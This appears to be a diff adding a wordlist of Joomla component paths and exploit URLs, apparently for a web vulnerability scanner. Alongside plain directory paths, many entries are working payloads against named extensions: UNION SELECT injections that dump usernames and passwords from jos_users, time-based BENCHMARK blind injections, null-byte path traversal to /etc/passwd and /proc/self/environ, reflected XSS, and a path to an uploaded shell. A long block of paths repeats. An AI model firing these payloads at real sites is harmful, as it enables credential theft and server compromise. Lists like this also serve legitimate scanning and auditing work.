+components/com_dadamail/
+components/com_dailymessage/
+components/com_datsogallery/
+components/com_dbquery/
+components/com_detail/
+components/com_digistore/
+components/com_directory/
+components/com_djiceshoutbox/
+components/com_doc/
+components/com_downloads/
+components/com_ds-syndicate/
+components/com_dtregister/
+components/com_dv/externals/phpupload/upload.php");
+components/com_easybook/
+components/com_emcomposer/
+components/com_equotes/
+components/com_estateagent/
+components/com_eventing/
+components/com_eventlist/
+components/com_events/
+components/com_ewriting/
+components/com_expose/uploadimg.php
+components/com_expshop/
+components/com_extcalendar/
+components/com_extcalendar/cal_popup.php?extmode=view&extid=
+components/com_extcalendar/extcalendar.php
+components/com_extended_registration/registration_detailed.inc.php
+components/com_extplorer/
+components/com_ezine/
+components/com_ezstore/
+components/com_facileforms/
+components/com_fantasytournament/
+components/com_faq/
+components/com_feederator/includes/tmsp/add_tmsp.php
+components/com_filebase/
+components/com_filiale/
+components/com_flashfun/
+components/com_flashmagazinedeluxe/
+components/com_flippingbook/
+components/com_flyspray/startdown.php
+components/com_fm/fm.install.php
+components/com_foevpartners/
+components/com_football/
+components/com_formtool/
+components/com_forum/
+components/com_fq/
+components/com_fundraiser/
+components/com_galeria/
+components/com_galleria/galleria.html.php
+components/com_gallery/
+components/com_game/
+components/com_gameq/
+components/com_garyscookbook/
+components/com_genealogy/
+components/com_geoboerse/
+components/com_gigcal/
+components/com_gmaps/
+components/com_googlebase/
+components/com_gsticketsystem/
+components/com_guide/
+components/com_hashcash/server.php
+components/com_hbssearch/
+components/com_hello_world/
+components/com_hotproperties/
+components/com_hotproperty/
+components/com_hotspots/
+components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
+components/com_hwdvideoshare/
+components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
+components/com_ice/
+components/com_idoblog/
+components/com_idvnews/
+components/com_ignitegallery/
+components/com_ijoomla_archive/
+components/com_ijoomla_rss/
+components/com_inter/
+components/com_ionfiles/
+components/com_is/
+components/com_ixxocart/
+components/com_jabode/
+components/com_jashowcase/
+components/com_jb2/
+components/com_jce/
+components/com_jcs/
+components/com_jd-wiki/
+components/com_jd-wp/
+components/com_jim/
+components/com_jjgallery/
+components/com_jmovies/
+components/com_jobline/
+components/com_jombib/
+components/com_joobb/
+components/com_jooget/
+components/com_joom12pic/
+components/com_joomla-visites/
+components/com_joomla_flash_uploader/
+components/com_joomlaboard/
+components/com_joomladate/ 
+components/com_joomlaflashfun/
+components/com_joomlalib/
+components/com_joomlaradiov5/
+components/com_joomlavvz/
+components/com_joomlaxplorer/
+components/com_joomloads/
+components/com_joomradio/
+components/com_joomtracker/
+components/com_joovideo/
+components/com_jotloader/
+components/com_journal/
+components/com_jpack/
+components/com_jpad/
+components/com_jreactions/
+components/com_jreviews/scripts/xajax.inc.php
+components/com_jumi/
+components/com_juser/
+components/com_jvideo/
+components/com_k2/
+components/com_kbase/
+components/com_knowledgebase/fckeditor/fckeditor.js
+components/com_kochsuite /
+components/com_kunena/
+components/com_letterman/
+components/com_lexikon/
+components/com_linkdirectory/
+components/com_listoffreeads/
+components/com_livechat/getSavedChatRooms.php
+components/com_livechat/xmlhttp.php
+components/com_liveticker/
+components/com_lm/
+components/com_lmo/
+components/com_loudmounth/includes/abbc/abbc.class.php
+components/com_loudmouth/
+components/com_lowcosthotels/
+components/com_lurm_constructor/admin.lurm_constructor.php
+components/com_mad4joomla/
+components/com_madeira/img.php
+components/com_maianmusic/
+components/com_mailarchive/
+components/com_mailto/
+components/com_mambatstaff/mambatstaff.php
+components/com_mambelfish/
+components/com_mambospgm/
+components/com_mambowiki/MamboLogin.php
+components/com_marketplace/
+components/com_mcquiz/
+components/com_mdigg/
+components/com_media_library/
+components/com_mediaslide/
+components/com_mezun/
+components/com_mgm/
+components/com_minibb/
+components/com_misterestate/
+components/com_mmp/help.mmp.php
+components/com_model/
+components/com_moodle/moodle.php
+components/com_moofaq/
+components/com_mosmedia/
+components/com_mospray/scripts/admin.php
+components/com_mosres/
+components/com_most/
+components/com_mp3_allopass/
+components/com_mtree/
+components/com_mtree/img/listings/o/{id}.php
+components/com_multibanners/extadminmenus.class.php
+components/com_myalbum/
+components/com_mycontent/
+components/com_mydyngallery/
+components/com_mygallery/
+components/com_n-forms/
+components/com_na_content/
+components/com_na_mydocs/
+components/com_na_newsdescription/
+components/com_na_qforms/
+components/com_neogallery/
+components/com_neorecruit/
+components/com_neoreferences/
+components/com_netinvoice/
+components/com_news/
+components/com_news_portal/
+components/com_newsflash/
+components/com_nfn_addressbook/
+components/com_nicetalk/
+components/com_noticias/
+components/com_omnirealestate/
+components/com_omphotogallery/
+components/com_ongumatimesheet20/
+components/com_onlineflashquiz/
+components/com_ownbiblio/
+components/com_panoramic/
+components/com_paxgallery/
+components/com_paxxgallery/
+components/com_pcchess/
+components/com_pcchess/include.pcchess.php
+components/com_pccookbook/
+components/com_pccookbook/pccookbook.php
+components/com_peoplebook/param.peoplebook.php
+components/com_performs/
+components/com_philaform/
+components/com_phocadocumentation/
+components/com_php/
+components/com_phpshop/toolbar.phpshop.html.php
+components/com_pinboard/
+components/com_pms/
+components/com_poll/
+components/com_pollxt/
+components/com_ponygallery/
+components/com_portafolio/
+components/com_portfol/
+components/com_prayercenter/
+components/com_pro_desk/
+components/com_prod/
+components/com_productshowcase/
+components/com_profiler/
+components/com_projectfork/
+components/com_propertylab/
+components/com_puarcade/
+components/com_publication/
+components/com_quiz/
+components/com_rapidrecipe/
+components/com_rdautos/
+components/com_realestatemanager/
+components/com_recly/
+components/com_referenzen/
+components/com_rekry/
+components/com_remository/admin.remository.php
+components/com_remository_files/file_image_14/1276100016shell.php
+components/com_reporter/processor/reporter.sql.php
+components/com_resman/
+components/com_restaurante/
+components/com_ricette/
+components/com_rsfiles/
+components/com_rsgallery/
+components/com_rsgallery2/
+components/com_rss/
+components/com_rssreader/
+components/com_rssxt/
+components/com_rwcards/
+components/com_school/
+components/com_search/
+components/com_sebercart/getPic.php?p=[LFD]%00
+components/com_securityimages/
+components/com_sef/
+components/com_seminar/
+components/com_serverstat/install.serverstat.php
+components/com_sg/
+components/com_simple_review/
+components/com_simpleboard/
+components/com_simplefaq/
+components/com_simpleshop/
+components/com_sitemap/sitemap.xml.php
+components/com_slideshow/
+components/com_smf/
+components/com_smf/smf.php
+components/com_swmenupro/
+components/com_team/
+components/com_tech_article/
+components/com_thopper/
+components/com_thyme/
+components/com_tickets/
+components/com_tophotelmodule/
+components/com_tour_toto/
+components/com_trade/
+components/com_uhp/
+components/com_uhp2/
+components/com_user/controller.php
+components/com_users/
+components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
+components/com_vehiclemanager/
+components/com_versioning /
+components/com_videodb/core/videodb.class.xml.php
+components/com_virtuemart/
+components/com_volunteer/
+components/com_vr/
+components/com_waticketsystem/
+components/com_webhosting/
+components/com_weblinks/
+components/com_webring/
+components/com_wmtgallery/
+components/com_wmtportfolio/
+components/com_x-shop/
+components/com_xevidmegahd/
+components/com_xewebtv/
+components/com_xfaq/
+components/com_xgallery/helpers/img.php?file=
+components/com_xsstream-dm/
+components/com_ynews/
+components/com_yvcomment/
+components/com_zoom/classes/
+components/mod_letterman/
+components/remository/
+eXtplorer/
+easyblog/entry/uncategorized
+extplorer/
+components/com_mtree/img/listings/o/{id}.php where {id}
+includes/joomla.php
+index.php/404'
+index.php/?option=com_question&catID=21' and+1=0 union all
+index.php/image-gallery/"><script>alert('xss')</script>/25-koala
+index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&amp;type=css&v=1
+index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
+index.php?option=com_aardvertiser&cat_name=conf&task=<=
+index.php?option=com_aardvertiser&task=
+index.php?option=com_abc&view=abc&letter=AS&sectionid='
+index.php?option=com_advert&id=36'
+index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
+index.php?option=com_alfurqan15x&action=viewayat&surano=
+index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
+index.php?option=com_annonces&view=edit&Itemid=1
+index.php?option=com_articleman&task=new
+index.php?option=com_bbs&bid=-1
+index.php?option=com_beamospetition&startpage=3&pet=-
+index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users-
+index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
+index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1
+index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
+index.php?option=com_chronoconnectivity&itemid=1
+index.php?option=com_chronocontact&itemid=1
+index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=
+index.php?option=com_clantools&squad=1+
+index.php?option=com_clantools&task=clanwar&showgame=1+
+index.php?option=com_commedia&format=raw&task=image&pid=4&id=964'
+index.php?option=com_commedia&task=page&commpid=21
+index.php?option=com_connect&view=connect&controller=
+index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
+index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_dioneformwizard&controller=[LFI]%00
+index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1
+index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12
+index.php?option=com_easyfaq&Itemid=1&task=view&gid=
+index.php?option=com_easyfaq&catid=1&task=view&id=-2527+
+index.php?option=com_easyfaq&task=view&contact_id=
+index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=
+index.php?option=com_equipment&task=components&id=45&sec_men_id=
+index.php?option=com_equipment&view=details&id=
+index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
+index.php?option=com_etree&view=displays&layout=category&id=[SQL]
+index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]
+index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
+index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
+index.php?option=com_filecabinet&task=download&cid[]=7
+index.php?option=com_firmy&task=section_show_set&Id=-1
+index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
+index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=
+index.php?option=com_graphics&controller=
+index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=
+index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=
+index.php?option=com_huruhelpdesk&view=detail
+index.php?option=com_huruhelpdesk&view=detail&cid[0]=
+index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
+index.php?option=com_iproperty&view=agentproperties&id=
+index.php?option=com_jacomment&view=
+index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
+index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
+index.php?option=com_jcommunity&controller=members&task=1'
+index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
+index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
+index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
+index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
+index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
+index.php?option=com_jfuploader&Itemid=
+index.php?option=com_jgen&task=view&id=
+index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
+index.php?option=com_jimtawl&Itemid=12&task=
+index.php?option=com_jmarket&controller=product&task=1'
+index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1'
+index.php?option=com_jomdirectory&task=search&type=111+
+index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
+index.php?option=com_joomla_flash_uploader&Itemid=1
+index.php?option=com_joomleague&func=showNextMatch&p=[sqli]
+index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
+index.php?option=com_joomtouch&controller=
+index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
+index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
+index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
+index.php?option=com_jstore&controller=product-display&task=1'
+index.php?option=com_jsubscription&controller=subscription&task=1'
+index.php?option=com_jtickets&controller=ticket&task=1'
+index.php?option=com_konsultasi&act=detail&sid=
+index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
+index.php?option=com_kunena&func=userlist&search=
+index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
+index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
+index.php?option=com_matamko&controller=
+index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm
+index.php?option=com_neorecruit&task=offer_view&id=
+index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
+index.php?option=com_noticeboard&controller=
+index.php?option=com_obsuggest&controller=
+index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
+index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
+index.php?option=com_oziogallery&Itemid=
+index.php?option=com_page&id=53
+index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
+index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
+index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]
+index.php?option=com_phocagallery&view=categories&Itemid=
+index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_php&file=../../../../../../../../../../etc/passwd
+index.php?option=com_php&file=../images/phplogo.jpg
+index.php?option=com_php&file=../js/ie_pngfix.js
+index.php?option=com_ponygallery&Itemid=[sqli]
+index.php?option=com_products&catid=-1
+index.php?option=com_products&id=-1
+index.php?option=com_products&product_id=-1
+index.php?option=com_products&task=category&catid=-1
+index.php?option=com_properties&task=agentlisting&aid=
+index.php?option=com_qcontacts&Itemid=1'
+index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
+index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_restaurantguide&view=country&id='&Itemid=69
+index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
+index.php?option=com_seyret&view=
+index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
+index.php?option=com_smartsite&controller=
+index.php?option=com_spa&view=spa_product&cid=
+index.php?option=com_spidercalendar
+index.php?option=com_spidercalendar&date=1'
+index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_staticxt&staticfile=test.php&id=1923
+index.php?option=com_szallasok&mode=8&id=25 (SQL)
+index.php?option=com_tag&task=tag&tag=
+index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
+index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
+index.php?option=com_ultimateportfolio&controller=
+index.php?option=com_users&view=registration
+index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
+index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_x-shop&action=artdetail&idd='
+index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
+index.php?option=com_xcomp&controller=../../[LFI]%00
+index.php?option=com_xvs&controller=../../[LFI]%00
+index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
+index.php?option=com_yjcontactus&view=
+index.php?option=com_youtube&id_cate=4
+index.php?option=com_zina&view=zina&Itemid=9
+index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
+index.php?search=NoGe&option=com_esearch&searchId=
+index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
+index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
+js/index.php?option=com_socialads&view=showad&Itemid=94
+libraries/joomla/utilities/compat/php50x.php
+libraries/pcl/pcltar.php
+libraries/phpmailer/phpmailer.php
+libraries/phpxmlrpc/xmlrpcs.php
+modules/mod_artuploader/upload.php");
+modules/mod_as_category.php
+modules/mod_calendar.php
+modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
+modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
+modules/mod_jfancy/script.php");
+modules/mod_ppc_simple_spotlight/elements/upload_file.php
+modules/mod_ppc_simple_spotlight/img/
+modules/mod_pxt/
+modules/mod_quick_question.php
+modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
+patch/makedown.php?arquivo=../../../../etc/passwd
+plugins/content/efup_files/helper.php");
+plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
+plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
+plugins/editors/xstandard/attachmentlibrary.php
+print.php?task=person&id=36 and 1=1
+templates/be2004-2/
+templates/ja_purity/
+wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
+web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'&controller=../../../../../../../../../../../../[LFI]%00
+?1.5.10-x
+?1.5.11-x-http_ref
+?1.5.11-x-php-s3lf
+?1.5.3-path-disclose
+?1.5.3-spam
+?1.5.8-x
+?1.5.9-x
+?j1012-fixate-session
+?option=com_mysms&Itemid=0&task=phonebook
+Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png
+admin/
+administrator/
+administrator/components/
+administrator/components/com_a6mambocredits/
+administrator/components/com_a6mambohelpdesk/
+administrator/components/com_admin/admin.admin.html.php
+administrator/components/com_astatspro/refer.php
+administrator/components/com_bayesiannaivefilter/
+administrator/components/com_chronocontact/excelwriter/PPS/File.php
+administrator/components/com_colophon/
+administrator/components/com_colorlab/
+administrator/components/com_comprofiler/
+administrator/components/com_comprofiler/plugin.class.php
+administrator/components/com_cropimage/admin.cropcanvas.php
+administrator/components/com_extplorer/
+administrator/components/com_feederator/includes/tmsp/add_tmsp.php
+administrator/components/com_googlebase/
+administrator/components/com_installer
+administrator/components/com_jcs/
+administrator/components/com_jim/
+administrator/components/com_jjgallery/
+administrator/components/com_joom12pic/
+administrator/components/com_joomla-visites/
+administrator/components/com_joomla_flash_uploader/
+administrator/components/com_joomlaflashfun/
+administrator/components/com_joomlaradiov5/
+administrator/components/com_jpack/
+administrator/components/com_jreactions/
+administrator/components/com_juser/
+administrator/components/com_admin/
+administrator/components/com_kochsuite /
+administrator/components/com_linkdirectory/
+administrator/components/com_livechat/getSavedChatRooms.php
+administrator/components/com_livechat/xmlhttp.php
+administrator/components/com_lurm_constructor/admin.lurm_constructor.php
+administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
+administrator/components/com_mambelfish/
+administrator/components/com_mgm/
+administrator/components/com_mmp/help.mmp.php
+administrator/components/com_mosmedia/
+administrator/components/com_multibanners/extadminmenus.class.php
+administrator/components/com_panoramic/
+administrator/components/com_peoplebook/param.peoplebook.php
+administrator/components/com_phpshop/toolbar.phpshop.html.php
+administrator/components/com_remository/admin.remository.php
+administrator/components/com_serverstat/install.serverstat.php
+administrator/components/com_simpleswfupload/uploadhandler.php");
+administrator/components/com_swmenupro/
+administrator/components/com_treeg/
+administrator/components/com_uhp/
+administrator/components/com_uhp2/
+administrator/components/com_webring/
+administrator/components/com_wmtgallery/
+administrator/components/com_wmtportfolio/
+administrator/components/com_x-shop/
+administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
+administrator/index.php?option=com_searchlog&act=log
+ajaxim/
+akocomments.php
+cart?Itemid=[SQLi]
+component/com__brightweblinks/
+component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
+component/osproperty/?task=agent_register
+component/quran/index.php?option=com_quran&action=viewayat&surano=
+components/com_ clickheat/
+components/com_5starhotels/
+components/com_Jambook/jambook.php
+components/com_a6mambocredits/
+components/com_a6mambohelpdesk/
+components/com_ab_gallery/
+components/com_acajoom/
+components/com_acctexp/
+components/com_aclassf/
+components/com_activities/
+components/com_actualite/
+components/com_admin/admin.admin.html.php
+components/com_advancedpoll/
+components/com_agora/
+components/com_agoragroup/
+components/com_ajaxchat/
+components/com_akobook/
+components/com_akocomment/
+components/com_akogallery
+components/com_alberghi/
+components/com_allhotels/
+components/com_alphacontent/
+components/com_altas/
+components/com_amocourse/
+components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
+components/com_articles/
+components/com_artist/
+components/com_artlinks/
+components/com_asortyment/
+components/com_astatspro/
+components/com_awesom/
+components/com_babackup/
+components/com_banners/
+components/com_bayesiannaivefilter/
+components/com_be_it_easypartner/
+components/com_beamospetition/
+components/com_biblestudy/
+components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+components/com_blog/
+components/com_bookflip/
+components/com_bookjoomlas/
+components/com_booklibrary/
+components/com_books/
+components/com_bsadv/
+components/com_bsq_sitestats/
+components/com_bsq_sitestats/external/rssfeed.php
+components/com_bsqsitestats/
+components/com_calendar/
+components/com_camelcitydb2/
+components/com_candle/
+components/com_casino_blackjack/
+components/com_casino_videopoker/
+components/com_casinobase/
+components/com_catalogproduction/
+components/com_catalogshop/
+components/com_category/
+components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
+components/com_chronocontact/excelwriter/PPS/File.php
+components/com_cinema/
+components/com_clasifier/
+components/com_classifieds/
+components/com_clickheat/
+components/com_cloner/
+components/com_cmimarketplace/
+components/com_cms/
+components/com_colophon/
+components/com_colorlab/
+components/com_competitions/
+components/com_comprofiler/
+components/com_comprofiler/plugin.class.php
+components/com_contactinfo/
+components/com_content/
+components/com_cpg/cpg.php
+components/com_cropimage/admin.cropcanvas.php
+components/com_custompages/
+components/com_cx/
+components/com_d3000/
+components/com_dadamail/
+components/com_dailymessage/
+components/com_datsogallery/
+components/com_dbquery/
+components/com_detail/
+components/com_digistore/
+components/com_directory/
+components/com_djiceshoutbox/
+components/com_doc/
+components/com_downloads/
+components/com_ds-syndicate/
+components/com_dtregister/
+components/com_dv/externals/phpupload/upload.php");
+components/com_easybook/
+components/com_emcomposer/
+components/com_equotes/
+components/com_estateagent/
+components/com_eventing/
+components/com_eventlist/
+components/com_events/
+components/com_ewriting/
+components/com_expose/uploadimg.php
+components/com_expshop/
+components/com_extcalendar/
+components/com_extcalendar/cal_popup.php?extmode=view&extid=
+components/com_extcalendar/extcalendar.php
+components/com_extended_registration/registration_detailed.inc.php
+components/com_extplorer/
+components/com_ezine/
+components/com_ezstore/
+components/com_facileforms/
+components/com_fantasytournament/
+components/com_faq/
+components/com_feederator/includes/tmsp/add_tmsp.php
+components/com_filebase/
+components/com_filiale/
+components/com_flashfun/
+components/com_flashmagazinedeluxe/
+components/com_flippingbook/
+components/com_flyspray/startdown.php
+components/com_fm/fm.install.php
+components/com_foevpartners/
+components/com_football/
+components/com_formtool/
+components/com_forum/
+components/com_fq/
+components/com_fundraiser/
+components/com_galeria/
+components/com_galleria/galleria.html.php
+components/com_gallery/
+components/com_game/
+components/com_gameq/
+components/com_garyscookbook/
+components/com_genealogy/
+components/com_geoboerse/
+components/com_gigcal/
+components/com_gmaps/
+components/com_googlebase/
+components/com_gsticketsystem/
+components/com_guide/
+components/com_hashcash/server.php
+components/com_hbssearch/
+components/com_hello_world/
+components/com_hotproperties/
+components/com_hotproperty/
+components/com_hotspots/
+components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
+components/com_hwdvideoshare/
+components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
+components/com_ice/
+components/com_idoblog/
+components/com_idvnews/
+components/com_ignitegallery/
+components/com_ijoomla_archive/
+components/com_ijoomla_rss/
+components/com_inter/
+components/com_ionfiles/
+components/com_is/
+components/com_ixxocart/
+components/com_jabode/
+components/com_jashowcase/
+components/com_jb2/
+components/com_jce/
+components/com_jcs/
+components/com_jd-wiki/
+components/com_jd-wp/
+components/com_jim/
+components/com_jjgallery/
+components/com_jmovies/
+components/com_jobline/
+components/com_jombib/
+components/com_joobb/
+components/com_jooget/
+components/com_joom12pic/
+components/com_joomla-visites/
+components/com_joomla_flash_uploader/
+components/com_joomlaboard/
+components/com_joomladate/ 
+components/com_joomlaflashfun/
+components/com_joomlalib/
+components/com_joomlaradiov5/
+components/com_joomlavvz/
+components/com_joomlaxplorer/
+components/com_joomloads/
+components/com_joomradio/
+components/com_joomtracker/
+components/com_joovideo/
+components/com_jotloader/
+components/com_journal/
+components/com_jpack/
+components/com_jpad/
+components/com_jreactions/
+components/com_jreviews/scripts/xajax.inc.php
+components/com_jumi/
+components/com_juser/
+components/com_jvideo/
+components/com_k2/
+components/com_kbase/
+components/com_knowledgebase/fckeditor/fckeditor.js
+components/com_kochsuite /
+components/com_kunena/
+components/com_letterman/
+components/com_lexikon/
+components/com_linkdirectory/
+components/com_listoffreeads/
+components/com_livechat/getSavedChatRooms.php
+components/com_livechat/xmlhttp.php
+components/com_liveticker/
+components/com_lm/
+components/com_lmo/
+components/com_loudmounth/includes/abbc/abbc.class.php
+components/com_loudmouth/
+components/com_lowcosthotels/
+components/com_lurm_constructor/admin.lurm_constructor.php
+components/com_mad4joomla/
+components/com_madeira/img.php
+components/com_maianmusic/
+components/com_mailarchive/
+components/com_mailto/
+components/com_mambatstaff/mambatstaff.php
+components/com_mambelfish/
+components/com_mambospgm/
+components/com_mambowiki/MamboLogin.php
+components/com_marketplace/
+components/com_mcquiz/
+components/com_mdigg/
+components/com_media_library/
+components/com_mediaslide/
+components/com_mezun/
+components/com_mgm/
+components/com_minibb/
+components/com_misterestate/
+components/com_mmp/help.mmp.php
+components/com_model/
+components/com_moodle/moodle.php
+components/com_moofaq/
+components/com_mosmedia/
+components/com_mospray/scripts/admin.php
+components/com_mosres/
+components/com_most/
+components/com_mp3_allopass/
+components/com_mtree/
+components/com_mtree/img/listings/o/{id}.php
+components/com_multibanners/extadminmenus.class.php
+components/com_myalbum/
+components/com_mycontent/
+components/com_mydyngallery/
+components/com_mygallery/
+components/com_n-forms/
+components/com_na_content/
+components/com_na_mydocs/
+components/com_na_newsdescription/
+components/com_na_qforms/
+components/com_neogallery/
+components/com_neorecruit/
+components/com_neoreferences/
+components/com_netinvoice/
+components/com_news/
+components/com_news_portal/
+components/com_newsflash/
+components/com_nfn_addressbook/
+components/com_nicetalk/
+components/com_noticias/
+components/com_omnirealestate/
+components/com_omphotogallery/
+components/com_ongumatimesheet20/
+components/com_onlineflashquiz/
+components/com_ownbiblio/
+components/com_panoramic/
+components/com_paxgallery/
+components/com_paxxgallery/
+components/com_pcchess/
+components/com_pcchess/include.pcchess.php
+components/com_pccookbook/
+components/com_pccookbook/pccookbook.php
+components/com_peoplebook/param.peoplebook.php
+components/com_performs/
+components/com_philaform/
+components/com_phocadocumentation/
+components/com_php/
+components/com_phpshop/toolbar.phpshop.html.php
+components/com_pinboard/
+components/com_pms/
